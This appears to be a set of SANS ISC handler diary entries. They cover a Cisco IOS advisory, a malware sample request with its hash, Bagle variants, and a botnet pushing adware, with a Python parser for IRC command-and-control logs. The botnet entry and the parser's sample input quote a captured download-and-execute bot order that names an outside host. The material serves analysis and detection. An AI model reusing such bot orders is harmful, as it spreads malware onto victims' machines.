Cisco IOS Security Advisory
Today Cisco released an advisory regarding an IOS Heap-based Overflow Vulnerability in System Timers. It can be found here. Some users wrote to us asking whether they should rush to upgrade their routers. In the words of one of our handlers, a brief explanation is that "this is related to the ipv6 vulnerability that cisco released patches for midyear AND the mike lynn black hat briefing which exploited that vulnerability and a timer vulnerability."
-------------------------------------------------------------
Handler on Duty: Pedro Bueno (pbueno //%// isc. sans. org)
Sample needed - of Spybot.ZIF, which scans for vulnerable Cisco Routers
If anyone catches a sample of this one please upload it through our contact page. Thanks!
Thanks to Jakob S for sending us the sample.
Its MD5 sum is:
2ec1fa5fca52b9c36bddea3511178882 svcdata.exe
so if you have a different sample let us know.
For what it's worth, Symantec detects this as W32.Spybot.ZIF while Kaspersky detects it as Backdoor.Win32.Rbot.adf.
Malware Analysis Quiz IV
If you missed the previous ones, there is still time to start...! :)
Check it here!
------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno //%// isc. sans. org)
6 bagle versions in 1 day
"The Bagles are continuing to come in. We've detected 6 new variants so far, and just released an urgent update. The first 2 - 3 variants were aggressively spammed. The others have been placed on sites and will be downloaded to victim machines. It's the latest move to keep the botnet up and running."
So, check your virus definitions and try to get the newest ones ASAP.
--------------------------------------------------------------
Handler On Duty: Pedro Bueno ( pbueno //%// isc. sans. org)
Botnets and Adware/Spyware connection
I am sure you already know about botnets, right? Ok, I am quite sure that you also know that one of the purposes of botnets, besides all the nice stuff written by our Handler Mike Poor in his diary Big Business surrounding Internet Fraud, is to spread malware, right? Ok (again), today I would like to show you how botnets are also spreading adware/spyware software. As the bot is remotely controlled by the botnet owner, it can do anything...
While investigating a bot today, I found this instruction to the bot:
:MySQL 332 USA|xxxxxxx #c :xdownload32 http://news-affairs.com/ysb.exe c:\ysb.exe 1
This instruction told my bot to download the ysb.exe 'software' to my computer and open it, as the next messages show:
#c :[DOWNLOAD]: Downloading URL: http://news-affairs.com/ysb.exe to: c:\ysb.exe.
#c :[DOWNLOAD]: Downloaded 67.3 KB to c:\ysb.exe @ 33.6 KB/sec.
#c :[DOWNLOAD]: Opened: c:\ysb.exe.
As soon as it was downloaded and opened, this window came up:
This 'software' is recognized by some AV at VirusTotal as a downloader or ISTbar.
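The first line above is an IRC RPL_TOPIC (numeric 332) reply: the botnet owner has set the channel topic to a download-and-run order, so every bot that joins reads it and obeys, and the bot then reports progress back to the channel. For an analyst reviewing captured C&C traffic, the useful step is to pull out who is being told to fetch what, where it is dropped, and whether it was executed. The following Python parser is an added example written for this diary, not code from the bot or from the ISC. It uses the four lines shown above as sample input plus two constructed lines (an operator PRIVMSG pointing at the reserved host example.invalid and a benign chat message); the command aliases download and dl are assumed in addition to the xdownload32 verb actually seen.

```python
"""Extract download/execute orders and bot status replies from IRC C&C logs."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional
from urllib.parse import urlsplit

# Verbs that take "<url> <local path> <run flag>" arguments.
# xdownload32 is the verb seen in the diary; download/dl are assumed aliases.
DOWNLOAD_VERBS = {"xdownload32", "download", "dl"}

# RPL_TOPIC (numeric 332): ":<server> 332 <nick> <channel> :<topic>"
TOPIC_RE = re.compile(
    r"^:(?P<server>\S+)\s+332\s+(?P<nick>\S+)\s+(?P<chan>#\S+)\s+:(?P<text>.*)$")
# Channel message, either a full "[:prefix] PRIVMSG <chan> :<text>" or the
# prefix-stripped "<chan> :<text>" form in which the diary shows bot output.
PRIVMSG_RE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?(?:PRIVMSG\s+)?(?P<chan>#\S+)\s+:(?P<text>.*)$")
# Bot progress reports, e.g. "[DOWNLOAD]: Opened: c:\ysb.exe."
STATUS_RE = re.compile(r"^\[DOWNLOAD\]:\s*(?P<msg>.*?)\.?$")
OPENED_RE = re.compile(r"^Opened:\s*(?P<path>.+)$")


@dataclass
class Event:
    kind: str                       # "command" (order to the bot) or "status" (bot reply)
    channel: str
    text: str
    verb: Optional[str] = None
    url: Optional[str] = None
    host: Optional[str] = None
    local_path: Optional[str] = None
    run_after_download: bool = False  # trailing "1" means execute once fetched
    executed_path: Optional[str] = None


def parse_command(chan: str, text: str) -> Optional[Event]:
    """Recognise '<verb> <url> <local path> [run flag]' download orders."""
    parts = text.split()
    if len(parts) < 3 or parts[0].lower() not in DOWNLOAD_VERBS:
        return None
    verb, url, path = parts[0].lower(), parts[1], parts[2]
    run = len(parts) > 3 and parts[3] == "1"
    return Event("command", chan, text, verb, url, urlsplit(url).hostname, path, run)


def parse_line(line: str) -> Optional[Event]:
    """Classify one raw IRC line; returns None for traffic we do not care about."""
    line = line.rstrip("\r\n")
    m = TOPIC_RE.match(line)
    if m:
        # A topic acts as a standing order: every joining bot runs it.
        return parse_command(m["chan"], m["text"])
    m = PRIVMSG_RE.match(line)
    if not m:
        return None
    chan, text = m["chan"], m["text"]
    s = STATUS_RE.match(text)
    if s:
        ev = Event("status", chan, text)
        o = OPENED_RE.match(s["msg"])
        if o:
            ev.executed_path = o["path"]
        return ev
    return parse_command(chan, text)


def summarise(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Hosts contacted, files dropped, files ordered to run, files the bot reports opening."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    cmds = [e for e in events if e.kind == "command"]
    return {
        "download_hosts": sorted({e.host for e in cmds if e.host}),
        "drop_paths": sorted({e.local_path for e in cmds if e.local_path}),
        "run_requested": sorted({e.local_path for e in cmds if e.run_after_download}),
        "executed": [e.executed_path for e in events if e.executed_path],
    }


# Sample input: the four lines quoted in the diary, plus two constructed lines
# (an operator PRIVMSG towards the reserved host example.invalid, and ordinary chat).
SAMPLE_LINES = [
    r":MySQL 332 USA|xxxxxxx #c :xdownload32 http://news-affairs.com/ysb.exe c:\ysb.exe 1",
    r"#c :[DOWNLOAD]: Downloading URL: http://news-affairs.com/ysb.exe to: c:\ysb.exe.",
    r"#c :[DOWNLOAD]: Downloaded 67.3 KB to c:\ysb.exe @ 33.6 KB/sec.",
    r"#c :[DOWNLOAD]: Opened: c:\ysb.exe.",
    r":op!u@h PRIVMSG #c :xdownload32 http://example.invalid/upd.exe c:\upd.exe 0",   # constructed
    r":bot!u@h PRIVMSG #c :hello",                                                    # constructed
]

if __name__ == "__main__":
    for key, values in summarise(SAMPLE_LINES).items():
        print(f"{key}: {values}")
```

Two details matter for anyone turning this into a detection rule: the order arrives as a 332 topic reply rather than a PRIVMSG, so a rule that only inspects PRIVMSG traffic misses the standing command entirely, and the trailing "1" is what separates a silent drop from an immediate execution, so it is worth recording separately from the download itself.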
Nice points from the License Agreement:
9. OTHER SOFTWARE. You allow that third party software may be installed in the Software and the Integrated Search Technologies shall not be liable to anyone with respect to such third party software.
16. UPDATES. You grant Integrated Search Technologies permission to add/remove features and/or functions to the existing Software and/or Service, or to install new applications or third party software, at any time, in its sole discretion with or without your knowledge and/or interaction. By doing so, you agree to the terms of the new applications. You also grant Integrated Search Technologies permission to make any changes to the Software and/or Service provided at any time.
Ok, ok...old stuff, but always nice to know how these things suddenly appear on your computer...:)
------------------------------------------------------------------
Handler on Duty: Pedro Bueno